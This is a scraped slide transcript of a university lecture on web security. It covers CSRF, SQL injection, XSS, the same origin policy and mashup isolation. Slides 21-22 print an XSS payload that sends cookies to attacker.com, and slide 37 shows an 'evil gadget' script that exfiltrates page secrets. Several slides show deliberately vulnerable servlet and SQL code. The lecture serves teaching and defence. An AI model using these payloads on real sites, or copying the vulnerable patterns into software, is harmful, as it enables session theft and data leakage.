1 / 75

Web Programming and Security

Web Programming and Security. Lecture 2 Tamara Rezk. Security problems. Availability violation. Confidentiality violation Integrity violation. Attacks, summary. Phishing attacks (eg MySpace, 2006). Attacks, summary. Phishing attacks (eg MySpace, 2006)

gotzon
Download Presentation

Web Programming and Security

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Web Programming and Security Lecture 2 Tamara Rezk

  2. Security problems • Availability violation • Confidentiality violation • Integrity violation

  3. Attacks, summary • Phishing attacks (eg MySpace, 2006)

  4. Attacks, summary • Phishing attacks (eg MySpace, 2006) • Session integrity violation (eg Dansie shopping cart, 2006)

  5. Attacks, summary • Phishing attacks (eg MySpace, 2006) • Session integrity attacks (eg Dansie shopping cart, 2006) • Cross site request forgery attacks (eg Gmail, 2007)

  6. Prevention • Server side: • add a secret that the attacker cannot guess • re-authenticate for critical operations • User side: • logging off one site before using others

  7. Attacks, summary • Phishing attacks (eg MySpace, 2006) • Session integrity attacks (eg Dansie shopping cart, 2006) • Cross site request forgery attacks (eg Gmail, 2007) • Navigation policy based attacks (eg Guninski/Citibank, 1999)

  8. Attacks, classification? • Phishing attacks (eg MySpace, 2006) • Session integrity attacks (eg Dansie shopping cart, 2006) • Cross site request forgery attacks (eg Gmail, 2007) • Navigation policy based attacks (eg Guninski/Citibank, 1999)

  9. Lessons LearnedDo not trust the client on: • Maintaining integrity of sessions state • Running client code • Providing valid input

  10. Lessons LearnedDo not trust the client on: Providing valid input public class Greeting extends HttpServlet{ public void doGet{HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException{ res.setContentType(“text/html”); PrinterWriter out = res.getWriter(); String name = req.getParameter(“name”); out.println(“<HTML>\n<BODY>\n”); out.printl(“Greeting from “+ name + “\n”); out.println(“</BODY>\n</HTML>\n”); } }

  11. Lessons LearnedDo not trust the client http://host/Greeting?name=<script> …</script>

  12. Security in Web Applications Main source of vulnerabilities • Cross-site scripting • Information leakage • SQL Injection Multitier nature cause problems From Cenzic Web Security Trends Report Q1-Q2-2010

  13. Code injection • Data-tier code injection (SQL) • Client-tier code injection (Javascript) • Server-tier code injection

  14. SQL Injection Query = "SELECT score FROM Student where name = ‘" + input

  15. SQL Code Injection Attack, Microsoft 2008

  16. CardSystems out of business, 2005 (SQL Code injection attack) 263000 numbers stolen!

  17. Dynamic Code Generation s (i1, … , in)  c sserver program i1, … , in untrusted input (provided by client) c client code: HTML document with Javascript nodes let’s see a guestbook example

  18. Attack to the guestbook <script> alert(“attack!”); </script>

  19. Embedding Javascript External Javascript File <body> ... <script type="text/javascript" src=“myCode.js" /> <script type="text/javascript"> //<![CDATA[ alert("Page is loading"); //]]> </script> <p onclick="alert('I told you not to click on me!');"> Please do not click on this text.</p> ... </body> Inline Code Event Handler

  20. Let’s see some other ways to inject code

  21. Code Injection, other example • Untrusted client input: <script>window.location = “http://attacker.com?cookie=” + document.cookie; </script> • Goal: inject the code to a benign user; • Consequence: • Cookie stolen by attacker.com; • Possible sensitive private information;

  22. Code Injection & XSS - Example Guestbook server Benign user Database Get all entries <script>window.location = “http://attacker.com?cookie=” + document.cookie; </script> <script>window.location = “http://attacker.com?cookie=” + document.cookie; </script> Secret cookies Add entry: <script>window.location = “http://attacker.com?cookie=” + document.cookie; </script> Malicious user Attacker.com

  23. Existing Server-side Prevention Programmer Attention Required!! Vulnerable code Example: preg_replace ("script", "",input) Escaping Filtering X Release Patched code “<scrscriptipt>”  “<script>” Instruction Randomization Taint Analysis String Analysis …… Boyd et al. [2004] WebSSARI, Huang et al. [2004] Pixy, Jovanovic et al. [2006] Xie and Aiken [2006] … Mimamide [2005] Balzarotti [2008] Wasermann et al. [2008] … Randomized code

  24. HTML parser and browser quirks • Standard HTML Parser • Obtain target syntax tree • No ill-formed result produced • Various way of triggering JS engine(BEEP [Jim et al. 2007] • Event listener: (<DIV> :onclick "alert(msg)") • Hyperlink: (<A> :href"javascript:alert(msg)") • Dynamic code evaluation: eval, document.write • Solution: turning off all these features in Hop • Advantage of multitier language NOT identified by syntax difference

  25. Code Injection Attack vectors

  26. Web 2.0 Applications 2004: AJAX (Asynchronous Javascript and XML) becomes popular, social sites emerge XMLHttpRequest object for asynchronous communication request a service partial reloading of the webpage (iframe) Technologies: Web Browser, Web Server, HTTP , HTML CGI: Common Gateway Interface AJAX : Javascript, CSS, XML, DOM, XMLHttpRequest

  27. Mashups: HousingMaps, 2005

  28. Web Mashup Google Maps Gadget Integrator’s Housing Data Great way to use your data! Web application (client side): Integrating third-party gadget; Integrator partially sharing information to gadget; Example: Housingmap.com

  29. Le Monde is a mashup

  30. Code of Le Monde <iframe src= "http://www.youtube.com/embed/W8WP2SjsZw4?rel=0" width="520" height="294"frameborder="0"></iframe>

  31. ALL OR NOTHING TRUST MODEL IN THE BROWSER The Same Origin Policy

  32. Programming Model – Dilemma Using <iframe> frame Using <script> tag Full sharing (JS Env.) Running as integrator Gadget trusted Full isolation (by SOP) Running as gadget Limited sharing Frame identifier PostMessage X Google Maps Gadget Integrator’s Housing Data Google Maps Gadget Integrator’s Housing Data

  33. The same origin policy (SOP) • The <iframe> tag: what about Javascript behaviour? HEAP global object integrator’s code global object browser <iframesrc= http://b.com/gadget.js > … </iframe>

  34. The same origin policy (SOP) • The <script> tag permits to treat code as code from the same origin integrator’s code server a.com browser <script src= http://b.com/gadget.js> server b.com

  35. The same origin policy (SOP) • The <script> tag: what about Javascript behaviour? integrator’s code browser <script src= http://b.com/gadget.js >

  36. The same origin policy (SOP) Let’s talk about Javascript!!

  37. An evil gadget integrator.html <script src = “http://attacker.com/gadget.js”> </script> <div id=secret> 42 </div> </h1> gadget.js <script> secret=document.getElementById("secret").innerHTML; setTimeout('delayer()', 5000) delayer = function(){ window.location="EvilSite.php?secret="+secret; } </script>

  38. Javascript Important JavaScript detail: o.f is treated as o["f"] Thanks Shriram Krishnamurthi for this slide

  39. Is this function safe? lookup = function(o, fd) { if (fd === "XHR") { return "unsafe!"; } else { return o[fd]; } } If fd is not a string, JavaScript invokes the .toString method to convert the value to a string

  40. …in fact,lookupisunsafe! • badObj = • {toString: • function () { • return "XHR"}} • lookup(window, badObj) • window[badObj] • window[{toString: …}] • Window[{toS…: …}.toS… ()] • window[(function () …) ()] • window["XHR"]

  41. More evals: e.g., setTimeout: function f() { alert('hello'); } setTimeout(f, 1000); var s = "alert('hello') "; setTimeout(s, 1000); Any JavaScript string!

  42. Let’s try some more code with setTimeout

  43. <script> s="alert('Lets talk about Javascript!')"; setTimeout(s, 100) </script>

  44. <script> function fac(x) { if (x <= 1) { return 1; } return x*fac(x-1); } r = fac(3); s = "alert("+r+")" setTimeout(s, 100) </script>

  45. What happens now? <script src=attacker.js></script> </head> <body> <script> function fac(x) { if (x <= 1) { return 1; } return x*fac(x-1); } r = fac(4); s = "alert("+r+")" setTimeout(s, 100) </script>

  46. Anything Else? • Wrap DOM nodes and callbacks • Don’t hand references to DOM nodes to the wrong functions • Avoid other conditionally unsafe calls • Be aware of implicit method calls in JavaScript’s semantics • Simulate private fields (JavaScript provides none) • Disallow arbitrary traversal of the object graph • Avoid leaking the global object • Make sure all invariants hold over 50+ entry points Thank you Shrirma Krishnamurthi for all the recommendations! Check AdSafety

  47. The same origin policy (SOP) • The <iframe> tag: what about Javascript behaviour? HEAP global object integrator’s code global object browser <iframesrc= http://b.com/gadget.js > … </iframe>

  48. Frame Communication

  49. Fragment Identifier Messaging • Send information by navigating a frame • http://gadget.com/#hello • Navigating to fragment doesn’t reload frame • No network traffic, but frame can read its fragment • Not a secure channel • Confidentiality • Integrity • Authentication   

More Related